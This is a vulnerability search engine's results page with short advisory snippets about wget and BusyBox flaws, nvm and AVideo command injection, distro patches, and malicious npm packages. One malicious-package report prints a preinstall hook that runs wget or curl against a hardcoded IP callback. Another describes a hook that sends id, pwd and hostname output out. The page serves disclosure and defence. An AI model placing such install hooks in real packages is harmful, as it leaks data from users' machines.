CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

1521 matches found

Siemens RUGGEDCOM RST2428P Improper Access Control (CVE-2025-60876)

BusyBox wget thru 1.3.7 accepted raw CR 0x0D/LF 0x0A and other C0 control bytes in the HTTP request-target path/query, allowing the request line to be split and attacker-controlled headers to be injected. To preserve the HTTP/1.1 request-line shape METHOD SP request-target SP HTTP/1.1, a raw spac...

6.5CVSS7.1AI score0.00252EPSS

Exploits1References3

Nuclei•added 2026/06/16 7:13 a.m.•230 views

ManageEngine Desktop Central Java Deserialization

Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution. id: CVE-2020-10189 info: name: ManageEngine Desktop Central Java Deserialization author: king-alexander severity: critical description: | Zoho ManageEngine...

10CVSS9.2AI score0.99941EPSS

Exploits6References5

OSV•added 2026/06/12 9:31 p.m.•10 views

MAL-2026-5719 Malicious code in ect-654321 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ec784a9a1926de8d2c18de41c996e69e10f7001bf9fdc7604edc22d5775b4540 ect-654321 contains only a package.json with a preinstall lifecycle hook that unconditionally executes wget...

5.4AI score

Exploits0References8

OSSF Malicious Packages•added 2026/06/12 9:31 p.m.•7 views

Malicious code in ect-839201-ctf (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bda37f74ff0d1b56cb7805906d4fd32a7e2ccc15aa96768d9f9e510202712dcb On npm install, package.json's preinstall script executes wget http://10.107.121.85:8000/callbackwget || curl http://10.107.121.85:8000/callbackcurl ...

6.2AI score

Exploits0References2

OSV•added 2026/06/12 9:31 p.m.•6 views

MAL-2026-5721 Malicious code in ect-839201-ctf (npm)

6.2AI score

Exploits0References2

Tenable Nessus•added 2026/06/10 12:0 a.m.•6 views

EulerOS 2.0 SP13 : busybox (EulerOS-SA-2026-2281)

According to the versions of the busybox package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : BusyBox wget thru 1.3.7 accepted raw CR 0x0D/LF 0x0A and other C0 control bytes in the HTTP request- target path/query, allowing the request line ...

6.5CVSS7.2AI score0.00252EPSS

Exploits1References2

OSV•added 2026/06/09 5:34 p.m.•6 views

MAL-2026-5449 Malicious code in morningstar-design-system (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 18591ac1a5cb5ca3d11e07bde38f230dccc530bb4614d45f9be1f547677a2c9e On npm install, the package's preinstall lifecycle script runs wget against a hardcoded bare-IP HTTP endpoint, passing the output of id, pwd, hostnam...

5.6AI score

Exploits0References3

RedhatCVE•added 2026/06/05 7:20 p.m.•8 views

CVE-2026-41304

WWBN AVideo is an open source video platform. In versions 29.0 and below, the cloneServer.json.php endpoint in the CloneSite plugin constructs shell commands using user-controlled input url parameter without proper sanitization. The input is directly concatenated into a wget command executed via...

9.8CVSS5.8AI score0.02221EPSS

Exploits1References1

EUVD•added 2026/06/04 5:2 p.m.•11 views

EUVD-2026-34303

nvm Node Version Manager through 0.40.4 executes arbitrary commands from version strings supplied by the configured Node.js/io.js mirror. Commands such as nvm install read the available versions from the mirror's index.tab and use the selected version, without sanitization, to build download URLs...

7.5CVSS6.1AI score0.00464EPSS

Exploits1References4

CVE•added 2026/06/04 5:2 p.m.•19 views

CVE-2026-10796

Vulnerability summary (CVE-2026-10796) : nvm (Node Version Manager)

7.5CVSS6.1AI score0.00464EPSS

Exploits1References4Affected Software1

Rosalinux•added 2026/06/01 8:41 a.m.•9 views

Advisory ROSA-SA-2026-3298

Software: wget 1.21.3 Operating System: ROSA-CHROME Unaffected versions: = wget-1.21.3-2 Affected versions: wget-1.21.3-2 CVE-ID: CVE-2024-38428 BDU-ID: 2024-04683 CVE-Crit: Medium CVE-DESCRIPTION: The vulnerability in the userinfo URI of the GNU Wget download manager is related to insecure...

9.1CVSS5.8AI score0.00672EPSS

Exploits0

OSSF Malicious Packages•added 2026/05/22 12:13 a.m.•8 views

Malicious code in ignite-market-contractstest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b9babd9b088785649368dbf885050b6a15b218a6b38d2dcd058f0c9eda5109da package.json declares a preinstall lifecycle hook that runs wget --quiet...

5.8AI score

Exploits0References2

AstraLinux•added 2026/05/20 5:53 a.m.•20 views

Astra Linux - уязвимость в busybox

Busybox contains a vulnerability related to SSL certificate validation. This vulnerability exists in the “busybox wget” applet, and it can lead to the execution of arbitrary code. This vulnerability appears to be exploitable by simply downloading any file over an HTTPS connection using “busybox...

8.1CVSS7AI score0.02462EPSS

Exploits0References2

OSV•added 2026/05/15 8:32 a.m.•8 views

CLSA-2026-1778811697 wget: Fix of CVE-2021-31879

CVE-2021-31879: do not propagate Authorization/Cookie headers across HTTP 3xx redirects openSUSE patch...

6.1CVSS6.9AI score0.01104EPSS

Exploits0References1

OSV•added 2026/04/25 8:51 a.m.•7 views

CLSA-2026-1776960429 busybox: Fix of 4 CVEs

CVE-2018-1000517: fix heap buffer overflow in wget chunked decoding - CVE-2017-16544: reject terminal control sequences in shell tab completion - CVE-2018-20679: reject zero-length DHCP options and validate 4-byte option lengths - CVE-2019-5747: validate DHCPSUBNET option length before decoding...

9.8CVSS7.3AI score0.32381EPSS

Exploits14References1